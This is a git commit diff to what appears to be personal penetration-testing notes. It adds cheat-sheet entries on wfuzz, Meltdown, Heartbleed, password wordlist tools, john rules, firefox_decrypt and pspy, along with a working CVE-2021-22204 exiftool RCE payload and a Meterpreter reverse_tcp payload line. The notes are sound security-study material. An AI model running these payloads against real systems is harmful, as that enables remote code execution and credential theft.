added password stuff
This commit is contained in:
parent
c328c604dd
commit
469aeb2618
|
@ -70,3 +70,6 @@
|
||||||
[submodule "exploit/web/content_security_policy/JSONBee"]
|
[submodule "exploit/web/content_security_policy/JSONBee"]
|
||||||
path = exploit/web/content_security_policy/JSONBee
|
path = exploit/web/content_security_policy/JSONBee
|
||||||
url = https://github.com/zigoo0/JSONBee.git
|
url = https://github.com/zigoo0/JSONBee.git
|
||||||
|
[submodule "post_exploitation/firefox_decrypt"]
|
||||||
|
path = post_exploitation/firefox_decrypt
|
||||||
|
url = https://github.com/unode/firefox_decrypt.git
|
||||||
|
|
|
@ -0,0 +1,6 @@
|
||||||
|
# Wfuzz
|
||||||
|
|
||||||
|
* Fuzz parameters
|
||||||
|
```sh
|
||||||
|
wfuzz -c -z file,/usr/share/seclists/Discovery/Web-Content/common.txt -X POST --hh 45 -u http://<target-IP>/api/items\?FUZZ\=test
|
||||||
|
```
|
|
@ -0,0 +1,26 @@
|
||||||
|
# Meltdown
|
||||||
|
|
||||||
|
* [PoC from IAIK](https://github.com/IAIK/meltdown.git)
|
||||||
|
![Overview](https://gcdn.pbrd.co/images/IitOpaf.png?raw=true "Meltdown")
|
||||||
|
|
||||||
|
* Each page table entries has the following flag values
|
||||||
|
* SUP (user or kernel mode)
|
||||||
|
* READ
|
||||||
|
* WRITE
|
||||||
|
|
||||||
|
* Flags are checked by the MMU
|
||||||
|
|
||||||
|
* Pipelined steps of an instruction are the following
|
||||||
|
* Fetch
|
||||||
|
* Decode
|
||||||
|
* Execute
|
||||||
|
* Memory access
|
||||||
|
* Register write back
|
||||||
|
|
||||||
|
* A pipeline can execute one of each steps concurrently every clock cycle.
|
||||||
|
* The MMU may jump between instruction queued in the pipeline to make use of time while the current instruction stalls.
|
||||||
|
* __Speculative execution__ is the reordering of instructions to speed up execution inside the pipeline.
|
||||||
|
* If a condition is executed speculatively, kernel memory may be executed. No error is thrown, because the is no assurance if the condition will actually be executed in the end.
|
||||||
|
|
||||||
|
* [Kernel Page Table Isolation](http://www.brendangregg.com/blog/2018-02-09/kpti-kaiser-meltdown-performance.html) can be used to mitigate meltdown.
|
||||||
|
|
|
@ -0,0 +1,12 @@
|
||||||
|
# CVE-2021-22204
|
||||||
|
|
||||||
|
* Craft an a payload and execute it via exiftool
|
||||||
|
* [Article](https://blog.convisoappsec.com/en/a-case-study-on-cve-2021-22204-exiftool-rce/)
|
||||||
|
|
||||||
|
## Usage
|
||||||
|
* Payload is `(metadata "\c${system('id')};")`
|
||||||
|
```sh
|
||||||
|
sudo apt install djvulibre-bin
|
||||||
|
bzz payload payload.bzz
|
||||||
|
djvumake exploit.djvu INFO='1,1' BGjp=/dev/null ANTz=payload.bzz
|
||||||
|
```
|
|
@ -0,0 +1,8 @@
|
||||||
|
# Heartbleed
|
||||||
|
|
||||||
|
* SSL V1.0.1 and V1.0.1f
|
||||||
|
* Client sends msg, msglength
|
||||||
|
* If msg is 0 and the msglength is longer, return from server is arbitrary memory content
|
||||||
|
|
||||||
|
* [Heartbleed](https://heartbleed.com)
|
||||||
|
|
|
@ -1 +1 @@
|
||||||
Subproject commit c765a2e0d0c25b883dcb92a6966c69b9880098da
|
Subproject commit eb411ea89b11df4485733201860619883a4f05e6
|
|
@ -1 +0,0 @@
|
||||||
{"typ": "JWT", "alg": "HS256"}
|
|
|
@ -123,6 +123,7 @@ document.onkeypress = function (e) {
|
||||||
```
|
```
|
||||||
## Tricks and Tips
|
## Tricks and Tips
|
||||||
* Use Polyglots
|
* Use Polyglots
|
||||||
|
* [XSS Filter Evasion Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html)
|
||||||
|
|
||||||
## Protection Methods
|
## Protection Methods
|
||||||
|
|
||||||
|
@ -133,3 +134,5 @@ There are many ways to prevent XSS, here are the 3 ways to keep cross-site scrip
|
||||||
2. Validating Input - This is the process of ensuring your application is rendering the correct data and preventing malicious data from doing harm to your site, database and users. Input validation is disallowing certain characters from being submit in the first place.
|
2. Validating Input - This is the process of ensuring your application is rendering the correct data and preventing malicious data from doing harm to your site, database and users. Input validation is disallowing certain characters from being submit in the first place.
|
||||||
|
|
||||||
3. Sanitising - Lastly, sanitizing data is a strong defence but should not be used to battle XSS attacks alone. Sanitizing user input is especially helpful on sites that allow HTML markup, changing the unacceptable user input into an acceptable format. For example you could sanitise the < character into the HTML entity <
|
3. Sanitising - Lastly, sanitizing data is a strong defence but should not be used to battle XSS attacks alone. Sanitizing user input is especially helpful on sites that allow HTML markup, changing the unacceptable user input into an acceptable format. For example you could sanitise the < character into the HTML entity <
|
||||||
|
|
||||||
|
|
||||||
|
|
|
@ -1,10 +1,34 @@
|
||||||
# Generate Wordlists
|
# Generate Wordlists
|
||||||
|
|
||||||
|
* [username_generator](https://github.com/therodri2/username_generator.git)
|
||||||
* [CeWL](../enumeration/CeWL/README.md)
|
* [CeWL](../enumeration/CeWL/README.md)
|
||||||
* [Mentalist](https://github.com/sc0tfree/mentalist.git)
|
* [Mentalist](https://github.com/sc0tfree/mentalist.git)
|
||||||
* [lyricpass](https://github.com/initstring/lyricpass.git)
|
* [lyricpass](https://github.com/initstring/lyricpass.git)
|
||||||
* [pnwgen phonenumbers](https://github.com/toxydose/pnwgen.git)
|
* [pnwgen phonenumbers](https://github.com/toxydose/pnwgen.git)
|
||||||
|
|
||||||
|
|
||||||
|
## Cupp
|
||||||
|
|
||||||
|
* [cupp](https://github.com/Mebus/cupp.git)
|
||||||
|
* Interactive dialogue via `cupp.py -i`
|
||||||
|
* Wordlistdownload via `cupp.py -l`
|
||||||
|
* Connections to alecto DB via `-a`
|
||||||
|
|
||||||
|
## crunch
|
||||||
|
|
||||||
|
```sh
|
||||||
|
crunch <minlen> <maxlen> <charPool> -o <output.file>
|
||||||
|
```
|
||||||
|
|
||||||
|
* Option `-t` specifies variable characters
|
||||||
|
* `@`, lower case alpha characters
|
||||||
|
* `,`, upper case alpha characters
|
||||||
|
* `%`, numeric characters
|
||||||
|
* `^`, special characters including space
|
||||||
|
```sh
|
||||||
|
crunch 8 8 -t passw%%rd
|
||||||
|
```
|
||||||
|
|
||||||
## ttpassgen
|
## ttpassgen
|
||||||
* [ttpassgen](https://github.com/tp7309/TTPassGen.git)
|
* [ttpassgen](https://github.com/tp7309/TTPassGen.git)
|
||||||
* Generate lists from the ground up
|
* Generate lists from the ground up
|
||||||
|
|
|
@ -31,3 +31,7 @@ $[0-9]$[0-9]
|
||||||
### Existing Rules
|
### Existing Rules
|
||||||
* `l33t`, l33tsp34k
|
* `l33t`, l33tsp34k
|
||||||
* `NT`, case mutation
|
* `NT`, case mutation
|
||||||
|
* Example for `best64`
|
||||||
|
```sh
|
||||||
|
john --wordlist=single_password.txt --rules=best64 --stdout > out.txt
|
||||||
|
```
|
||||||
|
|
|
@ -0,0 +1,9 @@
|
||||||
|
# Initial Passwords
|
||||||
|
|
||||||
|
* Services and products sometimes have credentials set initially.
|
||||||
|
|
||||||
|
* [default-password](https://default-password.info)
|
||||||
|
* [datarecovery](https://datarecovery.com/rd/default-passwords/)
|
||||||
|
|
||||||
|
|
||||||
|
|
|
@ -56,3 +56,14 @@ Authorized audit of security systems of computers and networks.
|
||||||
* [OSSTMM3](https://www.isecom.org/OSSTMM.3.pdf)
|
* [OSSTMM3](https://www.isecom.org/OSSTMM.3.pdf)
|
||||||
* [NIST](https://www.nist.gov/cyberframework)
|
* [NIST](https://www.nist.gov/cyberframework)
|
||||||
* [CAF](https://www.ncsc.gov.uk/collection/caf/caf-principles-and-guidance)
|
* [CAF](https://www.ncsc.gov.uk/collection/caf/caf-principles-and-guidance)
|
||||||
|
|
||||||
|
## Testing Webapps
|
||||||
|
|
||||||
|
* Two methods
|
||||||
|
1. Every Page and its functions one by one
|
||||||
|
2. Test by stages
|
||||||
|
* Authorization
|
||||||
|
* Authentication
|
||||||
|
* Injection
|
||||||
|
* Client Side Controls
|
||||||
|
* Application Logic
|
||||||
|
|
|
@ -144,3 +144,8 @@ sshuttle -r <user>@<target> --ssh-cmd "ssh -i <key>" <subnet/CIDR>
|
||||||
```
|
```
|
||||||
* Exclude servers via `-x`, for example the target/gateway server
|
* Exclude servers via `-x`, for example the target/gateway server
|
||||||
|
|
||||||
|
### Meterpreter
|
||||||
|
* Meterpreter with payload `set payload linux/x64/meterpreter_reverse_tcp` and
|
||||||
|
```sh
|
||||||
|
portfwd add -l 22 -p 22 -r 127.0.0.1
|
||||||
|
```
|
||||||
|
|
|
@ -0,0 +1 @@
|
||||||
|
Subproject commit b71a030ae8c2c5253716243a1a9375bd36074be8
|
|
@ -0,0 +1,5 @@
|
||||||
|
# pspy
|
||||||
|
|
||||||
|
* Snoop processes withou root permissions
|
||||||
|
* [Repo](https://github.com/DominicBreuker/pspy.git)
|
||||||
|
|
|
@ -0,0 +1,15 @@
|
||||||
|
#!/usr/bin/env python
|
||||||
|
|
||||||
|
def xor(data, key):
|
||||||
|
keylen = len(key)
|
||||||
|
return bytearray((
|
||||||
|
(data[i] ^ key[i % keylen]) for i in range(0,len(data))
|
||||||
|
))
|
||||||
|
|
||||||
|
|
||||||
|
if __name__ == "__main__":
|
||||||
|
data = bytearray(open('topsecret.txt', 'rb').read())
|
||||||
|
key = b'key'
|
||||||
|
res = xor(data, key)
|
||||||
|
print(res.decode())
|
||||||
|
|
Loading…
Reference in New Issue